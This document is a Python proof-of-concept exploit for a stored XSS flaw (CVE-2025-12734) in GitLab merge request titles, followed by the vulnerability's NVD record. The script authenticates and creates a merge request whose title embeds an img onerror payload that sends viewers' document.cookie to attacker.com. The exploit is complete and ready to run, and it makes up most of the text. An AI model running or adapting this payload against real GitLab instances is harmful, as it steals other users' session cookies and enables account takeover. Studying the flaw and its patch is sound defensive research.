CVE-2025-12734

# CVE-2025-12734 GitLab Merge Request Title XSS PoC # This PoC demonstrates the XSS vulnerability in GitLab Merge Request titles import requests import json from urllib.parse import quote # Configuration GITLAB_URL = "https://gitlab.example.com" USERNAME = "attacker_username" PASSWORD = "attacker_password" PROJECT_ID = "your_project_id" # XSS Payload - steals cookies when rendered in dialog XSS_PAYLOAD = '''<img src=x onerror=" fetch('https://attacker.com/steal?c=' + encodeURIComponent(document.cookie)) ">''' def login(): """Authenticate to GitLab and get session token""" session = requests.Session() login_url = f"{GITLAB_URL}/users/sign_in" # Get CSRF token response = session.get(login_url) csrf_token = session.cookies.get('_gitlab_session') # Login request login_data = { 'user[login]': USERNAME, 'user[password]': PASSWORD, 'authenticity_token': csrf_token } response = session.post(login_url, data=login_data) return session if response.status_code == 200 else None def create_malicious_mr(session): """Create Merge Request with XSS payload in title""" mr_url = f"{GITLAB_URL}/api/v4/projects/{PROJECT_ID}/merge_requests" mr_data = { 'title': f"Test MR {XSS_PAYLOAD}", 'source_branch': 'feature-branch', 'target_branch': 'main', 'description': 'Malicious MR for CVE-2025-12734 demonstration' } response = session.post(mr_url, json=mr_data) if response.status_code == 201: print(f"[+] Malicious MR created successfully") print(f"[+] XSS Payload embedded in title: {XSS_PAYLOAD}") print(f"[+] When viewed in dialog, the script will execute") return response.json() else: print(f"[-] Failed to create MR: {response.text}") return None def main(): print("="*60) print("CVE-2025-12734 GitLab Stored XSS PoC") print("="*60) # Step 1: Login to GitLab print("\n[1] Authenticating to GitLab...") session = login() if not session: print("[-] Authentication failed") return print("[+] Authentication successful") # Step 2: Create malicious MR print("\n[2] Creating malicious Merge Request...") result = create_malicious_mr(session) if result: print(f"\n[+] MR IID: {result.get('iid')}") print(f"[+] MR URL: {result.get('web_url')}") print("\n[!] Attack vector: When any user views this MR in a dialog,") print(" the XSS payload will execute in their browser context") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-12734", "sourceIdentifier": "[email protected]", "published": "2025-12-11T08:15:51.110", "lastModified": "2025-12-23T21:02:22.893", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.6 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have allowed an authenticated user to, under certain conditions, render content in dialogs to other users by injecting malicious HTML content into merge request titles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-116"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "15.6.0", "versionEndExcluding": "18.4.6", "matchCriteriaId": "C612892E-D034-429C-BE38-2D7DDFA62F02"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "15.6.0", "versionEndExcluding": "18.4.6", "matchCriteriaId": "43AAB62F-9E83-4BBD-85C1-37F85DAA5AC9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.4", "matchCriteriaId": "457DB333-60BE-44CD-A674-216AB658E14E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.4", "matchCriteriaId": "910967DB-0A8C-4436-9D9E-37BD610E7367"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.6.0", "versionEndExcluding": "18.6.2", "matchCriteriaId": "919A2588-3EA1-4E15-B47E-61B3E14B2781"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.6.0", "versionEndExcluding": "18.6.2", "matchCriteriaId": "6343A083-3E1C-4551-B230-76CABC3FDD67"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/579573", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3379381", "source": "[email protected]", "tags": ["Permissions Required"]}]}}